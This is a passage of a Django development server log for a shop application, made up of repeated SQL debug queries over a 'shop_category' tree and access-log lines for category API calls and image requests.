"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:40:39,050 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:40:39,060 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:40:39,067 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:40:39,072 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:40:39,077 utils 19021 139703101101824 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 13:40:39,083 utils 19021 139703090349824 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:40:39,089 utils 19021 139703101101824 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:40:39,090 utils 19021 139703090349824 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) [13/Dec/2019 13:40:39] "GET /api/v1/categories/10 HTTP/1.0" 200 183 DEBUG 2019-12-13 13:40:39,096 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:40:39,104 utils 19021 139703090349824 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:40:39,112 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:40:39,120 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:40:39,124 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:40:39,130 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:40:39,134 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:40:39,137 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:40:39,139 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:40:39,142 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:40:39,144 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:40:39,146 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:40:39,149 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:40:39,151 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:40:39,154 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:40:39,156 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:40:39,159 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:40:39,161 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:40:39,163 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:40:39,166 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:40:39,170 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:40:39,172 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:40:39,175 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:40:39,177 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:40:39,180 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:40:39,184 utils 19021 139703090349824 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:40:39,186 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:40:39,189 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:40:39,192 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:40:39,195 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:40:39] "GET /api/v1/categories/ HTTP/1.0" 200 8596 [13/Dec/2019 13:40:39] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [13/Dec/2019 13:40:39] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 304 0 [13/Dec/2019 13:40:39] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 304 0 [13/Dec/2019 13:40:39] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 304 0 [13/Dec/2019 13:40:40] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 304 0 [13/Dec/2019 13:40:40] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [13/Dec/2019 13:40:40] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [13/Dec/2019 13:40:40] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [13/Dec/2019 13:40:40] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 304 0 [13/Dec/2019 13:40:40] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [13/Dec/2019 13:40:40] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 [13/Dec/2019 13:40:44] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 13:41:03,034 utils 19021 139703101101824 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:41:03,049 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:41:03,054 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:41:03,058 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:41:03,063 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:41:03,067 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:41:03,071 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:41:03,075 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:41:03,080 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:41:03,086 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:41:03,090 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:41:03,094 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:41:03,104 utils 19021 139703101101824 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:41:03,108 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:41:03,114 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:41:03,118 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:41:03,121 utils 19021 139703090349824 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 13:41:03,127 utils 19021 139703101101824 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:41:03,132 utils 19021 139703090349824 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:41:03,134 utils 19021 139703101101824 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:41:03,137 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) [13/Dec/2019 13:41:03] "GET /api/v1/categories/6 HTTP/1.0" 200 192 DEBUG 2019-12-13 13:41:03,140 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:41:03,143 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:41:03,146 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:41:03,148 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:41:03,151 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; 